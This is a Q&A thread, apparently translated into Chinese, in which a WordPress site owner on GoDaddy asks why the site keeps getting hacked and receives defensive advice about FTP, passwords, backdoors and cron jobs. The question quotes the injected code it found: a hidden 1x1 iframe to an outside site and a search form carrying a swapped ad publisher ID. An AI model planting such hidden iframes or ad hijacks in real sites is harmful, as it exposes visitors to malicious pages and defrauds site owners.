那些遇到过的问题

网站又被黑了

Arp*_*mbi 7 hosting password hacking ftp godaddy

最终更新:

过去几周事情一直很平静,让我学到了更多关于网站安全和风险的知识。这是我的故事版本 -

我使用的是旧版本的 wordpress,可能是这个人从 google 上发现了我。我认为这是脚本攻击。很难说安全实际上是如何以及何时受到损害的,我在 2009 年 11 月 5 日注意到了这一点。虽然我当时采取了一些安全措施(如下所述),但总是有可能我错过了重新更改 wordpress 密码的可能性。我格式化了我的工作电脑。

现在我已经从托管中删除了所有不需要的 php 脚本,使管理部分只能对我的 IP 访问,阻止了属于越南的特定 IP 范围。每日备份和其他东西。问题是涉及的变量太多,很难跟踪每个变量。主要课程是为此做好准备。:)

我正在使用 GoDaddy 的共享托管计划并运行 WordPress 网站。我的网站第一次被黑是在 2009 年 11 月 5 日,当时黑客自己的广告替换了我的广告。我以为这是因为我对安全的懒惰,但我错了。

我格式化了我的电脑并重新设置了一切。将 ESET NOD32 替换为 Microsoft Security Essentials。升级到最新版本的 WordPress。更改了所有密码。设置一个新的数据库。以及我在这里和那里阅读的其他与安全相关的内容。事情运行良好,直到今天我的网站再次遭到黑客攻击。

上次,那家伙玩了很多文件,特意修改了footer.php和所有与广告相关的文件。但这一次他只是走对了地方,替换成了下面的代码——

<IFRAME height=1 src="http://blackberryrss.com/check.html" frameBorder=0 width=1></IFRAME>

<form action="http://www.google.com/cse" id="cse-search-box">
  <div>
    <input type="hidden" name="cx" value="partner-pub-2815780429722377:hhm6d0-6wfw" />

    <input type="hidden" name="ie" value="ISO-8859-1" />
    <input type="text" name="q" size="31" />
    <input type="submit" name="sa" value="Search" />
  </div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
Run Code Online (Sandbox Code Playgroud)

看起来那个人对操纵数据库等不感兴趣,而只是放置代码并快速赚钱。Godaddy 转发了我的 ftp 日志,发现来自 IP 的未授权访问 - 117.2.56.31。这个 IP 属于越南,而且http://blackberryrss.com与越南有一些联系。

我的帐户没有 SSH 访问权限,我使用 FireFTP 连接到 FTP。这是 GoDaddy 上次的回应——

在查看您的帐户后,我们发现您的 FTP 帐户已因本地计算机上的恶意软件或弱 FTP/托管密码而被盗用。

但是我已经更改了所有密码、删除了帐户等,但似乎没有任何效果。我现在一窍不通。请告诉我该怎么办?如何防止未经授权访问我的帐户????

额外细节:

  • 密码的强度只是强但不是最佳。
  • 我个人使用 Windows XP SP3、Windows 防火墙等。在第一次攻击后,我学会了使用用户帐户工作并避免使用管理员帐户。
  • 当我看到第一次攻击的 FTP 日志时,很明显该人正在手动执行所有这些操作。

KPW*_*INC 8

请记住,FTP 以 CLEAR TEXT 形式发送您的密码。所以妥协的可能性肯定存在。

另一件要考虑的事情是,您的 FTP 密码对您的主机来说是唯一的吗?你确定你没有在其他任何地方使用它吗?没有其他帐户、网站等?

您的 EMAIL 密码有多安全?我曾参与过这样的案例,其中“弱链接”实际上是 EMAIL 密码,而罪魁祸首只是向电子邮件发送“忘记密码”并从邮箱中删除证据,而每个人都忙于关注受感染的服务器注意。

想到的只是一些事情......当然还有一些其他事情是您的ISP或服务器上的某些软件漏洞或您托管的软件包之一的社会工程方法。

还有更多(显然)但那些通常是“通常的嫌疑人”。

更新:

根据这个新信息(黑客没有使用 FTP 来更改您的文件),我只能假设最可能的原因可能是不安全的 Web 应用程序。

这不是唯一的事情,但在这种情况下是最有可能的。

另一件要考虑(并检查)的事情是他是否给自己的应用程序留下了某种“后门”。我似乎记得你之前提到过你的 ISP 说他是通过 FTP 进来的。有没有可能他第一次通过FTP进来并给自己留下了后门?

此外,它是在黑暗中的一个镜头,但我亲眼目睹了被入侵的盒子,其中黑客只进来了一次,但留下了一个不断更改文件和其他各种邪恶的 cron 作业。有没有可能黑客没有回来而你正在处理一个自动化脚本?只是检查一下你是否觉得你已经用尽了所有其他可能性。

最后,您是否可以访问您的网络日志、系统日志等?如果是这样,他们怎么说?他们会透露任何线索吗?

归档时间:

查看次数:

1387 次

最近记录:

10 年,9 月 前
相关归档
共享密码的最佳实践和解决方案 62
允许跨平台同步的密码管理器 18
FTP 550:权限被拒绝 9
proFTPD无法确定IP地址 7
有没有使用 openstack 的主机? 4
任务计划程序如何在 Windows 7 上保存密码? 4
ftp 命令显示不同的文件修改时间 2
如何让xxx.one.com从yyy.two.com加载内容 1
SFTP 和 FileZilla - 连接被服务器关闭,退出代码为 128 1
如何通过http进行ftp? 1
难疑归档
系统管理员备忘单? 131
证书颁发机构根证书到期和续订 124
使用 Nginx 提供静态文件时禁用缓存(用于开发) 93
内存缓存与内存缓存? 76
Supervisor HTTP 服务器端口问题 66
xvda1 已 100% 满,这是什么?怎么修? 63
来自 Chrome 的对无意义 URL 的异常 HEAD 请求 62
如何在 Centos 5.5 上安装 libpq-dev 59
将密码添加到 .ssh/config 57
Nginx 位置正则表达式不适用于代理传递 53